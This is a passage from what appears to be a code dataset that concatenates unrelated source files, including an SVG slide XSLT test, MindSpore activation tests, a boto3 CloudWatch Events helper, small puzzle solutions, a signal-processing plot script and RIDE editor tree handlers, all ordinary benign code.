</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 7)' class='slidesetMenuHeader' x='0' y='0'>The SVG Community</text>
<g style='visibility:visible'>
<rect height='5' id='Expand3' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu3')" style='fill:white' width='5'/>
<rect height='5' id='Collapse3' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu3')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand3.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand3.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu3'>
<text id='slide3-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-1MenuItem')" onclick='onMenuItemSelected(evt, 8)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-1MenuItem')" class='slideMenuItem'>Some SVG Resources</text>
<text id='slide3-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-2MenuItem')" onclick='onMenuItemSelected(evt, 9)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-2MenuItem')" class='slideMenuItem'>Quote Them on it</text>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand2.click' to='0, 60'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse2.click' to='0, -60'/>
</g>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand1.click' to='0, 20'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse1.click' to='0, -20'/>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slideShowCover'>
<defs>
<linearGradient spreadMethod='pad' id='backgroundPaint' x1='0' y2='768' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='25%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='50%' style='stop-color:white; stop-opacity:1;'/>
<stop offset='75%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:black; stop-opacity:1;'/>
</linearGradient>
<filter height='105%' id='dropShadow' filterUnits='objectBoundingBox' x='0%' width='105%' y='0%'>
<feGaussianBlur in='SourceAlpha' result='blur' stdDeviation='4'/>
<feOffset dy='4' dx='4' result='offsetBlur' in='blur'/>
<feFlood style='flood-color:black' result='solidBlack'/>
<feComposite in='solidBlack' in2='SourceAlpha' result='separation' operator='in'/>
<feOffset dy='-1' dx='-1' result='offsetSeparation' in='separation'/>
<feMerge>
<feMergeNode in='offsetBlur'/>
<feMergeNode in='offsetSeparation'/>
<feMergeNode in='SourceGraphic'/>
</feMerge>
</filter>
</defs>
<rect height='768' style='fill:url(#backgroundPaint)' width='1024'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<g style='filter:url(#dropShadow)'>
<text class='slideCoverTitle' style='text-anchor:middle' x='512' y='300'>Introduction to SVG</text>
<g transform='translate(512, 490)' id='metadata' style='text-anchor:middle;'>
<text x='0' class='slideCoverSubTitle' y='0'>Uche Ogbuji</text>
<text x='0' class='slideCoverSubTitle' y='50'>Principal Consultant</text>
<text x='0' class='slideCoverSubTitle' y='100'>Fourthought Inc.</text>
<text x='0' class='slideCoverSubTitle' y='150'>Front Range XML Keiretsu</text>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover1'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>Background and Motivation</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover2'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The ABCs of SVG</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover3'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The SVG Community</text>
</g>
<g id='slide1-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Why Yet Another Graphics Format?</text>
<g><text x="240" y="150" class="itemClass">Leveraging the existing XML technology base</text></g>
<g><text x="240" y="185" class="itemClass">Integrating graphics into the semantic Web</text></g>
<g><text x="240" y="220" class="itemClass">Giving browsers access to image <tspan class='emphasis'>internals</tspan></text></g>
<g><text x="240" y="255" class="itemClass">Supporting the next generation of browsers</text></g>
</g>
<g id='slide2-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Features</text>
<text x='240' class='headingInline' y='150'>Basic Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='185'/>
<g><text x="270" y="185" class="itemClass">Coordinate spaces and transforms</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='220'/>
<g><text x="270" y="220" class="itemClass">Graphics primitives: ellipses, polygons, polylines, curves, etc.</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='255'/>
<g><text x="270" y="255" class="itemClass">Stylesheets: CSS, XSL, etc.</text></g>
<text x='240' class='headingInline' y='290'>Advanced Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='325'/>
<g><text x="270" y="325" class="itemClass">Raster filter effects</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='360'/>
<g><text x="270" y="360" class="itemClass">Alpha masking</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='395'/>
<g><text x="270" y="395" class="itemClass">Animation</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='430'/>
<g><text x="270" y="430" class="itemClass">Zooming and Panning</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='465'/>
<g><text x="270" y="465" class="itemClass">Scripting and extensibility</text></g>
</g>
<g id='slide2-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Source</text>
<text x='240' class='preformattedInline' y='135'>
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20000802//EN"
"http://www.w3.org/TR/2000/CR-SVG-20000802/DTD/svg-20000802.dtd"
>
<svg width="800" height="800">
<desc>SVG Sample for SunWorld Article</desc>
<style type="text/css">
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: black; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica }
</style>
<ellipse transform="translate(500 200)" rx="250" ry="100"
style="fill: brown; stroke: yellow; stroke-width: 10"/>
<polygon transform="translate(100 200) rotate(45)"
class="Lagos"
points="350,75 379,161 469,161 397,215 423,301 350,250 277,
301 303,215 231,161 321,161"/>
<text class="OrthoLogos" x="400" y="400">TO KALON</text>
<path class="ViaAppia" d="M500,600 C500,500 650,500 650,600
S800,700 800,600"/>
</svg>
</text>
</g>
<g id='slide2-3' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Output</text>
<g transform='translate(240, 135)'>
<svg height='10cm' width='10cm' viewBox='0 0 200 200'>
<desc>SVG Sample for SunWorld Article</desc>
<style type='text/css'>
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: white; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica; fill:white }
</style>
<ellipse transform='translate(500 200)' ry='100' rx='250' style='fill: brown; stroke: yellow; stroke-width: 10'/>
<polygon points='350,75 379,161 469,161 397,215 423,301 350,250 277, 301 303,215 231,161 321,161' transform='translate(100 200) rotate(45)' class='Lagos'/>
<text class='OrthoLogos' x='400' y='400'>TO KALON</text>
<path class='ViaAppia' d='M500,600 C500,500 650,500 650,600 S800,700 800,600'/>
</svg>
</g>
</g>
<g id='slide3-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Some SVG Resources</text>
<g><text x="240" y="150" class="itemClass"><tspan class='linkStyle'>The W3C's SVG Page</tspan></text></g>
<g><text x="240" y="185" class="itemClass"><tspan class='linkStyle'>OpenDirectory SVG Links</tspan></text></g>
<g><text x="240" y="220" class="itemClass"><tspan class='linkStyle'>How to make slides like these</tspan></text></g>
</g>
<g id='slide3-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Quote Them on it</text>
<text x='240' class='paraInline' y='150'>"Over twenty organizations, including Sun Microsystems, Adobe, Apple, IBM, and Kodak, have been involved in defining SVG."<tspan class='emphasis'> -- <NAME>, Sun</tspan>
</text>
<text x='240' class='paraInline' y='185'>"I have been working with computer graphics for
over 25 years and split an immense amount of blood on the floor at
midnight. With SVG I can now do almost anything I want [except for 3D - in
which I also have a molecular interest]. And I suspect that I can stick
with it for the foreseeable future." <tspan class='emphasis'>-- <NAME>, XML-DEV Founder</tspan>
</text>
<text x='240' class='paraInline' y='220'>"I envision a day where we have XHTML Web pages with SVG as the "chrome" of our interfaces--defining the buttons, the layers, the coloring, and the grid--where we can actually use a language that's XML-based rather than theses separate GIF files that can take so long to download. That's certainly one vision; that vision not just extending on the Web, on a monitor, but wireless onto my Palm Pilot or to print and other output as well." <tspan class='emphasis'>-- <NAME>, Razorfish</tspan>
</text>
</g>
</svg>"""
#"'
expected_1="""
<svg/>"""
def Test(tester):
    """Test-harness entry point: check that the Sun SVG slide-toolkit
    stylesheets are reachable, then run the XSLT transform test.

    The sheet_*_uri / source_1_uri names are defined at module level,
    outside this excerpt.
    """
    tester.startTest("Checking for SVG stylesheets")
    try:
        # NOTE(review): urllib.urlopen is the Python 2 API; under Python 3
        # this would be urllib.request.urlopen.
        import urllib
        for uri in (sheet_1_uri, sheet_2_uri, sheet_3_uri):
            # Opening each stylesheet URI is only a reachability probe;
            # the content is not read.
            fd = urllib.urlopen(uri)
            fd.close()
        tester.testDone()
    except (IOError, OSError):
        # Stylesheets missing: finish with installation instructions as a
        # warning rather than a hard failure.
        tester.warning(
            "You must have 'svgslides.xsl', 'svgslides_custom.xsl' and\n"
            "'slidescript.xsl' from Sun's SVG toolkit to run this test.\n"
            "See http://www.sun.com/software/xml/developers/svg-slidetoolkit/\n"
            "or ftp://ftp.fourthought.com/pub/third-party/test-material/\n"
            "It's enough to copy *.xsl from that package to the\n"
            "'%s' directory." % os.path.dirname(__file__))
        tester.testDone()
    else:
        # All stylesheets reachable: run the actual transform and compare
        # the result against expected_1.
        source = test_harness.FileInfo(uri=source_1_uri)
        sheet = test_harness.FileInfo(uri=sheet_1_uri)
        test_harness.XsltTest(tester, source, [sheet], expected_1)
    return
| 2.296875 | 2 |
src/2/2338.py | youngdaLee/Baekjoon | 11 | 16918 | """
2338. 긴자리 계산
작성자: xCrypt0r
언어: Python 3
사용 메모리: 29,380 KB
소요 시간: 72 ms
해결 날짜: 2020년 9월 13일
"""
def main():
    """Read two integers, one per line, from stdin and print their sum,
    difference, and product on three separate lines."""
    first = int(input())
    second = int(input())
    for value in (first + second, first - second, first * second):
        print(value)

if __name__ == '__main__':
    main()
| 3.390625 | 3 |
tests/ut/python/nn/test_activation.py | PowerOlive/mindspore | 3,200 | 16919 | <filename>tests/ut/python/nn/test_activation.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
    """Minimal cell applying nn.Softmax along the axis fixed at init."""

    def __init__(self, dim):
        super(SoftmaxNet, self).__init__()
        # Axis is chosen once at construction time.
        self._softmax = nn.Softmax(dim)

    def construct(self, x):
        return self._softmax(x)
@non_graph_engine
def test_compile():
    """Smoke test: SoftmaxNet over axis 0 runs on a fixed 2x2 float32 input."""
    model = SoftmaxNet(0)
    data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
    model(data)
@non_graph_engine
def test_compile_axis():
    """Smoke test: SoftmaxNet over the last axis with scaled random input."""
    scale = 355
    model = SoftmaxNet(-1)
    raw = np.random.randn(4, 16, 1, 1).astype(np.float32) * scale
    model(Tensor(raw))
class LogSoftmaxNet(nn.Cell):
    """Minimal cell applying nn.LogSoftmax along the axis fixed at init."""

    def __init__(self, dim):
        super(LogSoftmaxNet, self).__init__()
        self._log_softmax = nn.LogSoftmax(dim)

    def construct(self, x):
        return self._log_softmax(x)
@non_graph_engine
def test_compile_logsoftmax():
    """Smoke test: LogSoftmaxNet over axis 0 runs on a fixed 2x2 float32 input."""
    model = LogSoftmaxNet(0)
    data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
    model(data)
class Net1(nn.Cell):
    """Minimal cell wrapping nn.ReLU."""

    def __init__(self):
        super(Net1, self).__init__()
        self._act = nn.ReLU()

    def construct(self, x):
        return self._act(x)
def test_compile_relu():
    """Graph-compile Net1 (ReLU) against a fixed 2x2 float32 tensor."""
    model = Net1()
    data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
    _cell_graph_executor.compile(model, data)
class Net_gelu(nn.Cell):
    """Minimal cell wrapping nn.GELU."""

    def __init__(self):
        super(Net_gelu, self).__init__()
        self._act = nn.GELU()

    def construct(self, x):
        return self._act(x)
def test_compile_gelu():
    """Graph-compile Net_gelu against a fixed 2x2 float32 tensor."""
    model = Net_gelu()
    data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
    _cell_graph_executor.compile(model, data)
class NetLeakyReLU(nn.Cell):
    """Minimal cell wrapping nn.LeakyReLU with a configurable negative slope."""

    def __init__(self, alpha):
        super(NetLeakyReLU, self).__init__()
        self._act = nn.LeakyReLU(alpha)

    def construct(self, x):
        return self._act(x)
def test_compile_leaky_relu():
    """Graph-compile NetLeakyReLU(alpha=0.1) on a 2x3 float32 tensor that
    mixes positive, zero, and negative values."""
    model = NetLeakyReLU(alpha=0.1)
    data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
    _cell_graph_executor.compile(model, data)
| 2.03125 | 2 |
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py | marsishandsome/feast | 1 | 16920 | from abc import ABC, abstractmethod
from typing import Dict
import pandas as pd
from feast.data_source import DataSource
from feast.repo_config import FeastConfigBaseModel
class DataSourceCreator(ABC):
    """Contract for environment-specific test-data helpers.

    A concrete creator turns a dataframe into an offline DataSource,
    produces a matching offline-store configuration, and tears down any
    resources it created. Exact persistence semantics are up to each
    implementation.
    """

    @abstractmethod
    def create_data_source(
        self,
        destination: str,
        df: pd.DataFrame,
        event_timestamp_column="ts",
        created_timestamp_column="created_ts",
        field_mapping: Dict[str, str] = None,
    ) -> DataSource:
        """Create a DataSource for *df* under *destination*."""

    @abstractmethod
    def create_offline_store_config(self) -> FeastConfigBaseModel:
        """Return the offline-store configuration for this environment."""

    @abstractmethod
    def teardown(self):
        """Release any resources created by this creator."""

    @abstractmethod
    def get_prefixed_table_name(self, name: str, suffix: str) -> str:
        """Return the prefixed table name derived from *name* and *suffix*."""
| 2.65625 | 3 |
tests/interpreter/expression/var_assignment_interpreter_test.py | OtavioHenrique/yalul | 1 | 16921 | from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
    """Tests for the var-assignment expression interpreter."""

    def test_interpreting_var_assignment_without_errors(self):
        """Assigning to an existing variable updates the environment,
        returns the assigned value, and records no errors."""
        errors = InterpreterErrors()
        env = Environment({}, {})
        env.add_variable('Name', 'Gabriela')

        result = VarAssignmentInterpreter('Name', 'Otavio', env, errors).execute()

        assert result == 'Otavio'
        assert env.get_variable('Name') == 'Otavio'
        assert errors.errors == []

    def test_interpreting_var_assignment_errors(self):
        """Assigning to a variable that does not exist returns None and
        records an interpreter error."""
        errors = InterpreterErrors()
        env = Environment({}, {})

        result = VarAssignmentInterpreter('Name', 'Otavio', env, errors).execute()

        assert result is None
        assert errors.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
                                 'doesn\'t exists']
| 3.1875 | 3 |
backend/externals/events.py | crosspower/naruko | 17 | 16922 | import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
    """Thin wrapper around the CloudWatch Events API for NARUKO-managed rules."""

    def __init__(self):
        self.client = boto3.client('events', region_name=settings.NARUKO_REGION)

    def list_rules(self):
        """Return every NARUKO-prefixed rule as CloudWatchEvent models."""
        rules = []
        for page in self._list_rules():
            rules.extend(page)
        return rules

    def _list_rules(self):
        """Yield one list of CloudWatchEvent models per API page,
        following NextToken pagination until exhausted."""
        token = None
        while True:
            kwargs = {'NamePrefix': 'NARUKO-'}
            if token:
                kwargs['NextToken'] = token
            response = self.client.list_rules(**kwargs)
            yield self._build_cloudwatchevent(response["Rules"])
            token = response.get("NextToken")
            if not token:
                break

    @staticmethod
    def _build_cloudwatchevent(rules: dict):
        """Map raw rule dicts from the API into CloudWatchEvent models.

        ScheduleExpression may be absent (event-pattern rules), hence .get().
        """
        return [
            CloudWatchEvent(
                name=rule["Name"],
                schedule_expression=rule.get("ScheduleExpression"),
                is_active=rule["State"] == "ENABLED"
            )
            for rule in rules
        ]

    def save_event(self, event):
        """Upsert the rule and point its single target at the SNS topic.

        The target Input carries the event model id so the consumer can
        look the event up again.
        """
        rule = event.cloudwatchevent
        self.client.put_rule(
            Name=rule.name,
            ScheduleExpression=rule.schedule_expression,
            State="ENABLED" if rule.is_active else "DISABLED"
        )
        self.client.put_targets(
            Rule=rule.name,
            Targets=[dict(
                Id=rule.name,
                Arn=settings.EVENT_SNS_TOPIC_ARN,
                Input=json.dumps(dict(id=event.event_model.id))
            )]
        )
        return event

    def delete_event(self, event_name):
        """Delete a rule; its targets must be removed first."""
        self.client.remove_targets(
            Rule=event_name,
            Ids=[event_name]
        )
        self.client.delete_rule(
            Name=event_name
        )

    def describe_event(self, event_name):
        """Fetch a single rule and map it to a CloudWatchEvent model."""
        rule = self.client.describe_rule(
            Name=event_name
        )
        return CloudWatchEvent(
            name=rule["Name"],
            schedule_expression=rule["ScheduleExpression"],
            is_active=rule["State"] == "ENABLED"
        )
| 1.828125 | 2 |
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py | jiadaizhao/LeetCode | 49 | 16923 | <gh_stars>10-100
class Solution:
    def mostVisited(self, n: int, rounds: List[int]) -> List[int]:
        """Return the most-visited sectors, in ascending order.

        Only the first and last sectors of the marathon matter: every
        complete lap in between visits all sectors equally often, so the
        extra visits cover the arc from rounds[0] to rounds[-1].
        """
        first, last = rounds[0], rounds[-1]
        if first <= last:
            # No wrap-around: the extra visits are first..last.
            return [sector for sector in range(first, last + 1)]
        # Wrap-around: sectors 1..last and first..n get the extra visit.
        wrapped = [sector for sector in range(1, last + 1)]
        wrapped.extend(range(first, n + 1))
        return wrapped
| 2.96875 | 3 |
eg/deparse/example.py | KennethBlaney/rivescript-python | 0 | 16924 | #!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
# Build a bot from the example RiveScript file, then dump its in-memory
# representation ("deparse") as pretty-printed JSON to stdout.
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| 1.976563 | 2 |
figuras/PycharmKayStatisticalReport/example_8_11.py | bor9/estudiando_el_kay | 0 | 16925 | <filename>figuras/PycharmKayStatisticalReport/example_8_11.py
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal, linalg
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
# desired impulse response: a sinc (ideal low-pass with cutoff fc)
N = 50  # even number of samples (made odd by the +1 in the range below)
fc = 0.1
nf = 1024
n = np.arange(-N/2, N/2+1)
N += 1
f = np.arange(nf)/(2 * nf)
# orders of the filter to be designed (denominator p, numerator q)
p = 10
q = 10
# desired impulse response
hd = 2 * fc * np.sinc(2 * fc * n) # * np.hanning(N)
# desired frequency response
_, Hd = signal.freqz(hd, a=1, worN=nf, whole=False, plot=None)
# estimation of the denominator coefficients (a) via least squares
# hd = np.arange(N)
x = hd[q + 1:]
H = linalg.toeplitz(hd[q: N - 1], hd[q: q - p: -1])
# a_est = np.linalg.solve(H.T @ H, -H.T @ x)
# small Tikhonov-style regularization to stabilize the normal equations
epsilon = 1e-16
#epsilon = 0
a_est = linalg.solve(H.T @ H + epsilon * np.eye(p), -H.T @ x)
print("Número de Condición 1: {}".format(np.linalg.cond(H.T @ H)))
# numerator coefficients (b) from the first q+1 impulse-response samples
h = hd[: q + 1]
H0 = linalg.toeplitz(np.concatenate(([0], hd[: q])), np.zeros((p, )))
b_est = h + H0 @ a_est
#print(h)
#print(H0)
# frequency response of the estimated filter (prepend a0 = 1)
a_est = np.concatenate(([1], a_est))
print(a_est)
print(b_est)
_, H_est = signal.freqz(b_est, a_est, worN=nf, whole=False, plot=None)
# impulse response of the estimated filter (filter a unit impulse)
delta = np.zeros((N,))
delta[0] = 1
h_est = signal.lfilter(b_est, a_est, delta, axis=- 1, zi=None)
# plot styling: marker size and font size
ms = 3
fs = 12
n = np.arange(N)
fig = plt.figure(0, figsize=(9, 5), frameon=False)
# top-left: desired vs estimated impulse response
ax = plt.subplot2grid((8, 2), (0, 0), rowspan=6, colspan=1)
plt.xlim(0, N-1)
plt.ylim(np.amin(hd)-0.02, np.amax(hd)+0.02)
plt.plot(n, hd, linestyle='-', marker='s', color='k', markersize=ms, lw=1, label='${\\rm deseada}$')
plt.plot(n, h_est, linestyle='-', marker='s', color='r', markersize=ms, lw=1, label='${\\rm estimada}$')
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
ax.set_xticklabels([])
ax.set_ylabel('${\\rm Respuesta\;al\;impulso}$', fontsize=fs)
# bottom-left: approximation error per sample
ax = plt.subplot2grid((8, 2), (6, 0), rowspan=2, colspan=1)
e = hd-h_est
plt.xlim(0, N-1)
plt.ylim(np.amin(e)-0.001, np.amax(e)+0.001)
plt.plot(n, e, linestyle='-', marker='s', color='k', markersize=ms)
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel(r'$\epsilon[n]$', fontsize=fs)
# right: desired vs estimated frequency response in dB
# NOTE(review): 10*log10(|H|) is half the conventional 20*log10 magnitude
# in dB — confirm this scaling is intended.
ax = plt.subplot2grid((8, 2), (0, 1), rowspan=8, colspan=1)
plt.xlim(0, 0.5)
plt.ylim(-55, 8)
plt.plot(f, 10 * np.log10(np.abs(Hd)), 'k', label='${\\rm deseada}$')
plt.plot(f, 10 * np.log10(np.abs(H_est)), 'r', label='${\\rm estimada}$')
ax.set_xlabel('${\\rm Frecuencia\;normalizada}$', fontsize=fs)
ax.set_ylabel('${\\rm Respuesta\;en\;frecuencia\;(dB)}$', fontsize=fs)
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
plt.savefig('example_8_11.pdf', bbox_inches='tight')
plt.show()
src/robotide/ui/treenodehandlers.py | crylearner/RIDE3X | 1 | 16926 | <gh_stars>1-10
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
from robotide.controller.commands import (
RenameKeywordOccurrences, RemoveMacro, AddKeyword, AddTestCase, RenameTest,
CopyMacroAs, AddVariable, UpdateVariableName, RenameFile,
RenameResourceFile, DeleteFile, SortKeywords, Include, Exclude)
from robotide.controller.settingcontrollers import VariableController
from robotide.controller.macrocontrollers import (
TestCaseController, UserKeywordController)
from robotide.controller.filecontrollers import (
TestDataDirectoryController, ResourceFileController,
TestCaseFileController, ExcludedDirectoryController,
DirtyRobotDataException)
from robotide.editor.editordialogs import (
TestCaseNameDialog, UserKeywordNameDialog, ScalarVariableDialog,
ListVariableDialog, CopyUserKeywordDialog, DictionaryVariableDialog)
from robotide.publish import RideOpenVariableDialog
from robotide.ui.progress import LoadProgressObserver
from robotide.usages.UsageRunner import Usages, ResourceFileUsages
from .filedialogs import (
AddSuiteDialog, AddDirectoryDialog, ChangeFormatDialog, NewResourceDialog,
RobotFilePathDialog)
from robotide.utils import overrides
from robotide.widgets import PopupMenuItems
from .progress import RenameProgressObserver
from .resourcedialogs import ResourceRenameDialog, ResourceDeleteDialog
from robotide.ui.resourcedialogs import FolderDeleteDialog
def action_handler_class(controller):
    """Return the tree action-handler class matching *controller*'s type.

    Raises KeyError for controller types without a registered handler.
    """
    handler_map = {
        TestDataDirectoryController: TestDataDirectoryHandler,
        ResourceFileController: ResourceFileHandler,
        TestCaseFileController: TestCaseFileHandler,
        TestCaseController: TestCaseHandler,
        UserKeywordController: UserKeywordHandler,
        VariableController: VariableHandler,
        ExcludedDirectoryController: ExcludedDirectoryHandler,
    }
    return handler_map[controller.__class__]
class _ActionHandler(wx.Window):
    """Base class for tree-node context-menu action handlers.

    Subclasses list their menu entries in ``_actions`` (built from the
    ``_label_*`` constants below); a chosen entry is dispatched to the
    matching ``On<Label>`` method. The empty ``On*`` methods defined here
    are overridable hooks, so unsupported actions are silently ignored.
    """
    # Capability flags queried by the tree; subclasses override as needed.
    is_user_keyword = False
    is_test_suite = False
    is_variable = False
    # Menu label constants; a '\t<keys>' suffix declares the accelerator.
    _label_add_suite = 'New Suite\tCtrl-Shift-F'
    _label_add_directory = 'New Directory'
    _label_new_test_case = 'New Test Case\tCtrl-Shift-T'
    _label_new_user_keyword = 'New User Keyword\tCtrl-Shift-K'
    _label_sort_keywords = 'Sort Keywords'
    _label_new_scalar = 'New Scalar\tCtrl-Shift-V'
    _label_new_list_variable = 'New List Variable\tCtrl-Shift-L'
    _label_new_dict_variable = 'New Dictionary Variable'
    _label_change_format = 'Change Format'
    _label_copy_macro = 'Copy\tCtrl-Shift-C'
    _label_rename = 'Rename\tF2'
    _label_add_resource = 'Add Resource'
    _label_new_resource = 'New Resource'
    _label_find_usages = 'Find Usages'
    _label_select_all = 'Select All Tests'
    _label_deselect_all = 'Deselect All Tests'
    _label_select_failed_tests = 'Select Only Failed Tests'
    _label_select_passed_tests = 'Select Only Passed Tests'
    _label_delete = 'Delete\tCtrl-Shift-D'
    _label_delete_no_kbsc = 'Delete'
    _label_exclude = 'Exclude'
    _label_include = 'Include'
    _label_expand_all = 'Expand all'
    _label_collapse_all = 'Collapse all'
    def __init__(self, controller, tree, node, settings):
        wx.Window.__init__(self, tree)
        self.controller = controller
        self._tree = tree
        self._node = node
        self._settings = settings
        self._rendered = False
        # The handler itself is an invisible helper window of the tree.
        self.Show(False)
        self._popup_creator = tree._popup_creator
    @property
    def item(self):
        # Underlying data object of the handled controller.
        return self.controller.data
    @property
    def node(self):
        # Tree node this handler is attached to.
        return self._node
    def show_popup(self):
        """Show this handler's context menu built from ``_actions``."""
        self._popup_creator.show(self, PopupMenuItems(self, self._actions),
                                 self.controller)
    def begin_label_edit(self):
        # Default: node labels are not editable; mixins override this.
        return False
    def double_clicked(self):
        pass
    def end_label_edit(self, event):
        pass
    def OnDelete(self, event):
        pass
    def OnNewSuite(self, event):
        pass
    def OnNewDirectory(self, event):
        pass
    def OnNewResource(self, event):
        pass
    def OnNewUserKeyword(self, event):
        pass
    def OnNewTestCase(self, event):
        pass
    def OnNewScalar(self, event):
        pass
    def OnNewListVariable(self, event):
        pass
    def OnNewDictionaryVariable(self, event):
        pass
    def OnCopy(self, event):
        pass
    def OnFindUsages(self, event):
        pass
    def OnSelectAllTests(self, event):
        self._tree.SelectAllTests(self._node)
    def OnDeselectAllTests(self, event):
        self._tree.DeselectAllTests(self._node)
    def OnSelectOnlyFailedTests(self, event):
        self._tree.SelectFailedTests(self._node)
    def OnSelectOnlyPassedTests(self, event):
        self._tree.SelectPassedTests(self._node)
    def OnSafeDelete(self, event):
        pass
    def OnExclude(self, event):
        pass
